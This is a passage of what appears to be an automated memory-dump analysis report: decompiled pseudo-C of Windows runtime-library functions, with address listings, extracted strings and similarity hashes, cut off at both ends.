																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L016D70F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E016FFD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E016FFD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E016FFD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E016FFD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E016FFD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0x17b7b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0x17b7b84 = _t75;
						_t73 = E016DEB70(_t134, 0x17b7b60);
						if( *0x17b7b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E016DFF60( *0x17b7b20);
							}
						}
						goto L5;
					}
				}
			}

0x016ffab0
0x016ffab2
0x016ffab3
0x016ffab4
0x016ffabc
0x016ffac0
0x016ffb14
0x016ffb17
0x016ffac2
0x016ffac8
0x016ffacd
0x016ffad3
0x016ffad3
0x016ffadd
0x016ffb18
0x016ffb1b
0x016ffb1d
0x016ffb1e
0x016ffb1f
0x016ffb20
0x016ffb21
0x016ffb22
0x016ffb23
0x016ffb24
0x016ffb25
0x016ffb26
0x016ffb27
0x016ffb28
0x016ffb29
0x016ffb2a
0x016ffb2b
0x016ffb2c
0x016ffb2d
0x016ffb2e
0x016ffb2f
0x016ffb3a
0x016ffb3b
0x016ffb3e
0x016ffb41
0x016ffb44
0x016ffb47
0x016ffb4a
0x016ffb4d
0x016ffb53
0x0173bdcb
0x0173bdcb
0x016ffb59
0x016ffb5b
0x016ffb5b
0x016ffb5e
0x0173bdd5
0x0173bdd8
0x00000000
0x0173bdda
0x00000000
0x0173bdda
0x016ffb64
0x016ffb64
0x016ffb64
0x016ffb67
0x016ffb6e
0x016ffb70
0x016ffb72
0x00000000
0x016ffb78
0x016ffb7a
0x016ffb7a
0x016ffb7d
0x016ffb80
0x0173bddf
0x0173bde1
0x00000000
0x0173bde3
0x00000000
0x0173bde3
0x016ffb86
0x016ffb86
0x016ffb86
0x016ffb8b
0x016ffb90
0x016ffb92
0x016ffb94
0x016ffb9a
0x016ffb9b
0x016ffba1
0x0173bde8
0x0173bdeb
0x0173bded
0x0173beb5
0x0173beb5
0x0173bebb
0x0173bebd
0x0173bec3
0x0173bed2
0x0173bedd
0x0173bedd
0x0173beed
0x00000000
0x0173bdf3
0x0173bdfe
0x0173be06
0x0173be0b
0x0173be0d
0x0173be0f
0x0173be14
0x0173be19
0x0173be20
0x0173be25
0x0173be27
0x0173be35
0x0173be39
0x0173be46
0x0173be4f
0x0173be54
0x0173be56
0x0173bef8
0x0173bef8
0x00000000
0x0173be5c
0x0173be5c
0x0173be60
0x00000000
0x0173be66
0x0173be66
0x0173be7f
0x0173be84
0x0173be87
0x0173be89
0x0173be8b
0x0173be99
0x0173be9d
0x0173bea0
0x0173beac
0x0173beaf
0x0173beb1
0x0173beb3
0x0173beb3
0x00000000
0x0173bea2
0x0173bea2
0x00000000
0x0173bea2
0x0173be8d
0x0173be8d
0x0173be92
0x00000000
0x0173be92
0x0173be8b
0x0173be60
0x0173be3b
0x0173be3b
0x0173be3e
0x00000000
0x0173be40
0x0173be40
0x0173be44
0x00000000
0x00000000
0x00000000
0x00000000
0x0173be44
0x0173be3e
0x0173be29
0x0173be29
0x00000000
0x0173be29
0x0173be27
0x00000000
0x016ffba7
0x016ffba7
0x016ffbab
0x0173bf02
0x016ffbb1
0x016ffbb1
0x016ffbb8
0x016ffbbd
0x016ffbbd
0x016ffbbf
0x016ffbbf
0x016ffbc5
0x016ffbcb
0x016ffbf8
0x016ffbf8
0x016ffbfa
0x00000000
0x016ffc00
0x016ffc00
0x016ffc03
0x00000000
0x016ffc09
0x016ffc09
0x016ffc0f
0x016ffc15
0x016ffc23
0x016ffc23
0x016ffc25
0x016ffc27
0x016ffc75
0x016ffc7c
0x016ffc84
0x00000000
0x016ffc29
0x016ffc29
0x016ffc2d
0x016ffc30
0x0173bf0f
0x00000000
0x016ffc36
0x016ffc38
0x016ffc3b
0x016ffc41
0x0173bf17
0x0173bf19
0x0173bf48
0x0173bf4b
0x00000000
0x0173bf1b
0x0173bf22
0x0173bf24
0x0173bf26
0x00000000
0x0173bf2c
0x0173bf37
0x0173bf39
0x0173bf3b
0x00000000
0x0173bf41
0x0173bf41
0x0173bf41
0x0173bf41
0x0173bf45
0x00000000
0x0173bf45
0x0173bf3b
0x0173bf26
0x00000000
0x016ffc47
0x016ffc47
0x016ffc49
0x016ffcb2
0x016ffcb4
0x016ffcb6
0x016ffcdc
0x016ffcdc
0x00000000
0x016ffcb8
0x016ffcc3
0x016ffcc5
0x016ffcc7
0x00000000
0x016ffcc9
0x016ffcc9
0x016ffccd
0x00000000
0x016ffccd
0x016ffcc7
0x00000000
0x016ffc4b
0x016ffc4b
0x016ffc4e
0x016ffc4e
0x016ffc51
0x016ffc51
0x016ffc54
0x016ffc5a
0x016ffc5c
0x016ffc5f
0x016ffc61
0x016ffc63
0x016ffc65
0x016ffc67
0x016ffc6e
0x016ffc72
0x016ffc72
0x016ffc72
0x016ffc72
0x016ffc67
0x016ffc61
0x00000000
0x016ffc5a
0x016ffc49
0x016ffc41
0x016ffc30
0x016ffc27
0x016ffc03
0x016ffbcd
0x016ffbd3
0x016ffbd9
0x016ffbdc
0x016ffbde
0x016ffc99
0x016ffc9b
0x016ffc9d
0x016ffcd5
0x016ffcd5
0x016ffc89
0x016ffc89
0x00000000
0x016ffc9f
0x016ffc9f
0x016ffca3
0x00000000
0x016ffca3
0x00000000
0x016ffbe4
0x016ffbe4
0x016ffbe4
0x016ffbe4
0x016ffbe9
0x016ffbf2
0x00000000
0x016ffbf2
0x016ffbde
0x016ffbcb
0x016ffbab
0x016ffc8b
0x016ffc8b
0x016ffc8c
0x016ffb80
0x016ffb72
0x016ffb5e
0x016ffc8d
0x016ffc91
0x016ffadf
0x016ffadf
0x016ffae1
0x016ffae4
0x016ffae7
0x016ffaec
0x016ffaf8
0x016ffb00
0x016ffb07
0x016ffb0f
0x016ffb0f
0x016ffb07
0x00000000
0x016ffaf8
0x016ffadd

Strings

*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0173BE0F

Memory Dump Source

Source File: 0000000E.00000002.782536075.00000000016A0000.00000040.00000001.sdmp, Offset: 016A0000, based on PE: true

Similarity

API ID:
String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
API String ID: 0-865735534
Opcode ID: 021d883beeee5df3e087a763b725ea0ab106aaa57fcbd1d9bfafbaf3206111f2
Instruction ID: a37f695acfbddf9ece8409f69511a1e9ccc397e1fe75f2f947f04fa9208699eb
Opcode Fuzzy Hash: 021d883beeee5df3e087a763b725ea0ab106aaa57fcbd1d9bfafbaf3206111f2
Instruction Fuzzy Hash: 23A10472B006168BEB25CF6CCC54B7AB7A5AF88710F0445ADEB46CB791DB30D842CB90

Uniqueness

Uniqueness Score: -1.00%

Function 016C2D8A, Relevance: 1.4, Strings: 1, Instructions: 191
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E016C2D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0x17b5350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0x17b7bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E017097C0();
				}
				if( *0x17b79c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0x17b79c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E016F1624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E016E7D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E0175FE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E01709520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E016FE18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								L0171DF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0x17b6901;
								_push(_t109);
								_v52 = _t98;
								if( *0x17b6901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E01709980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E017095D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E016E7D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E016E7D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E01747016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E0175FDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0x17b5350;
							if(_t109 != 0x17b5350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E0175FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E01755720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}

0x016c2d8a
0x016c2d8a
0x016c2d92
0x016c2d96
0x016c2d9e
0x016c2da0
0x016c2da3
0x016c2da5
0x016c2da8
0x016c2dab
0x016c2db2
0x0171f9aa
0x0171f9ab
0x0171f9ae
0x0171f9ae
0x016c2db8
0x016c2dc2
0x0171f9b9
0x0171f9be
0x0171f9bf
0x0171f9bf
0x016c2dcf
0x0171f9c9
0x016c2dd5
0x016c2dd5
0x016c2dd5
0x016c2dde
0x016c2de1
0x016c2e70
0x016c2e72
0x016c2e72
0x016c2de7
0x016c2deb
0x016c2e7c
0x016c2e83
0x016c2e85
0x016c2e8b
0x016c2e8d
0x016c2e92
0x016c2e92
0x016c2e85
0x016c2df1
0x016c2df7
0x016c2df9
0x016c2df9
0x016c2dfc
0x016c2dff
0x016c2e02
0x00000000
0x016c2e05
0x016c2e0c
0x0171f9d9
0x016c2e12
0x016c2e12
0x016c2e12
0x016c2e1a
0x0171f9e3
0x0171f9e9
0x0171f9f0
0x0171f9f6
0x0171f9f8
0x0171f9f8
0x0171f9f0
0x016c2e23
0x0171fa02
0x0171fa03
0x0171fa05
0x0171fa06
0x00000000
0x016c2e29
0x016c2e29
0x016c2e2e
0x016c2e34
0x016c2e3e
0x00000000
0x00000000
0x016c2e44
0x016c2e47
0x016c2e4d
0x00000000
0x00000000
0x016c2e4f
0x016c2e54
0x00000000
0x00000000
0x016c2e5a
0x016c2e5f
0x016c2e9a
0x016c2ea4
0x016c2ea5
0x016c2ea8
0x016c2eaf
0x016c2eb2
0x016c2eb5
0x0171fae9
0x0171faeb
0x0171faed
0x0171faef
0x0171faf7
0x0171faf8
0x0171fafd
0x0171faff
0x0171fb04
0x0171fb04
0x0171faff
0x016c2ec0
0x016c2ec4
0x016c2ec6
0x016c2ec8
0x0171fb14
0x0171fb18
0x0171fb1e
0x0171fb21
0x0171fb21
0x016c2ece
0x016c2ece
0x016c2ece
0x016c2ed7
0x016c2e61
0x016c2e63
0x0171fa6b
0x0171fa71
0x0171fa76
0x0171fa78
0x0171fa8a
0x0171fa7a
0x0171fa83
0x0171fa83
0x0171fa8f
0x0171fa91
0x0171fa97
0x0171fa9d
0x0171faa4
0x0171faaa
0x0171faaf
0x0171fab1
0x0171fac3
0x0171fab3
0x0171fabc
0x0171fabc
0x0171fac8
0x0171facb
0x0171fadf
0x0171fadf
0x0171facb
0x0171faa4
0x0171fa91
0x016c2e6f
0x016c2e6f
0x016c2e5f
0x0171fa13
0x0171fa15
0x0171fa17
0x0171fa1f
0x0171fa21
0x0171fa22
0x0171fa25
0x0171fa28
0x0171fa2f
0x0171fa2f
0x0171fa2a
0x0171fa2a
0x0171fa2a
0x0171fa31
0x0171fa34
0x0171fa36
0x0171fa3c
0x0171fa3e
0x0171fa41
0x0171fa43
0x0171fa45
0x0171fa45
0x0171fa41
0x0171fa3c
0x0171fa4a
0x0171fa4f
0x0171fa51
0x0171fa53
0x0171fa56
0x0171fa5b
0x0171fa5e
0x00000000
0x0171fa5e
0x016c2e23

Strings

RTL: Re-Waiting, xrefs: 0171FA4A

Memory Dump Source

Source File: 0000000E.00000002.782536075.00000000016A0000.00000040.00000001.sdmp, Offset: 016A0000, based on PE: true

Similarity

API ID:
String ID: RTL: Re-Waiting
API String ID: 0-316354757
Opcode ID: 747307933cc01519dd696116fce2496ba521ff361440b5ffd762d7453ca5b03a
Instruction ID: e1d816c0ccb1d25f58136c6e4a56a02c94919c7db4b0e62c491ad7f29abee60d
Opcode Fuzzy Hash: 747307933cc01519dd696116fce2496ba521ff361440b5ffd762d7453ca5b03a
Instruction Fuzzy Hash: 7B614532A006059FDB32DF6CCC94B7EFBA5EB45B20F14026DDA11A72C5C734AA058B81

Uniqueness

Uniqueness Score: -1.00%

Function 01790EA5, Relevance: 1.4, Strings: 1, Instructions: 153
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E01790EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E0178FF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E01791074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E01709730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E0178A80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E0178A854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0x17b8b04 >> 0x14) + (_v44 -  *0x17b8b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E016E7D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E0178138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E016E7D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E0177FEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0x17b8724 & 0x00000008) != 0) {
						E017852F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E017915B5(0x17b8ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}

0x01790eb7
0x01790eb9
0x01790ec0
0x01790ec2
0x01790ecd
0x0179105b
0x0179105b
0x01791061
0x01791066
0x01791066
0x0179106b
0x01791073
0x01791073
0x01790ed3
0x01790ed6
0x01790edc
0x01790ee0
0x01790ee7
0x01790ef0
0x01790ef5
0x01790efa
0x01790efc
0x01790efd
0x01790f03
0x01790f04
0x01790f06
0x01790f07
0x01790f09
0x01790f0e
0x01790f14
0x01790f23
0x01790f2d
0x01790f34
0x01790f34
0x01790f14
0x01790f52
0x00000000
0x00000000
0x01790f58
0x01790f73
0x01790f74
0x01790f79
0x01790f7d
0x01790f80
0x01790f86
0x01790fab
0x01790fb5
0x01790fc6
0x01790fd1
0x01790fe3
0x01790fd3
0x01790fdc
0x01790fdc
0x01790feb
0x01791009
0x01791009
0x01791015
0x01791027
0x01791017
0x01791020
0x01791020
0x0179102f
0x0179103c
0x0179103c
0x01791048
0x01791050
0x01791050
0x01791055
0x00000000
0x01791055
0x01790f88
0x01790f9e
0x01790fa2
0x01790fa9
0x00000000
0x00000000
0x00000000
0x01790fa9
0x00000000

Strings

`, xrefs: 01790F16

Memory Dump Source

Source File: 0000000E.00000002.782536075.00000000016A0000.00000040.00000001.sdmp, Offset: 016A0000, based on PE: true

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: 25d92416b758dde016b5371b0fefed0ab295f0d23d146bb27c3897563d9f1c75
Instruction ID: b2fb96e54b937d82f56d5fd41cca5d2adaa59fc5ed1f599134a59e69bfa1b0bf
Opcode Fuzzy Hash: 25d92416b758dde016b5371b0fefed0ab295f0d23d146bb27c3897563d9f1c75
Instruction Fuzzy Hash: 5551B0713043429FDB25DF28E884B1BFBEAEBC4314F04092CFA5687290D671E909C762

Uniqueness

Uniqueness Score: -1.00%

Function 016FF0BF, Relevance: 1.4, Strings: 1, Instructions: 137
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E016FF0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E016E4120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E01709830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L016E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E01709990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E017095D0();
							goto L11;
						} else {
							_t109 = L016E4620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								E0170F3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E017095D0();
										L016E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

0x016ff0d3
0x016ff0d9
0x016ff0e0
0x016ff0e7
0x016ff0f2
0x016ff0f4
0x016ff0f8
0x016ff100
0x016ff108
0x016ff10d
0x016ff115
0x016ff116
0x016ff11f
0x016ff123
0x016ff124
0x016ff12c
0x016ff130
0x016ff134
0x016ff13d
0x016ff144
0x016ff14b
0x016ff152
0x0173bab0
0x0173bab0
0x016ff158
0x016ff158
0x016ff15a
0x016ff160
0x016ff165
0x016ff166
0x016ff16f
0x016ff173
0x0173baa7
0x0173baa7
0x0173baab
0x00000000
0x016ff179
0x016ff18d
0x016ff191
0x0173baa2
0x00000000
0x016ff197
0x016ff19b
0x016ff1a2
0x016ff1a9
0x016ff1af
0x016ff1b2
0x016ff1b6
0x016ff1b9
0x016ff1c4
0x016ff1d8
0x016ff1df
0x016ff1e3
0x016ff1eb
0x016ff1ee
0x016ff1f4
0x016ff20f
0x0173bab7
0x0173babb
0x0173bacc
0x0173bad1
0x016ff215
0x016ff218
0x016ff226
0x016ff22b
0x00000000
0x016ff22b
0x016ff1f6
0x016ff1f6
0x016ff1f9
0x016ff1fb
0x016ff1fb
0x016ff1f4
0x016ff191
0x016ff173
0x016ff152
0x016ff203

Strings

@, xrefs: 016FF124

Memory Dump Source

Source File: 0000000E.00000002.782536075.00000000016A0000.00000040.00000001.sdmp, Offset: 016A0000, based on PE: true

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction ID: 4e2504531d525c4efa5eba6be9ab9a708f12cd7b263b531f6d12b5db91725c78
Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction Fuzzy Hash: 5D516A725057119BC321DF29C840A6BBBF9FF88710F108A2DFA9587690E7B4E915CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01743540, Relevance: 1.4, Strings: 1, Instructions: 130
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E01743540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0x17bd360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
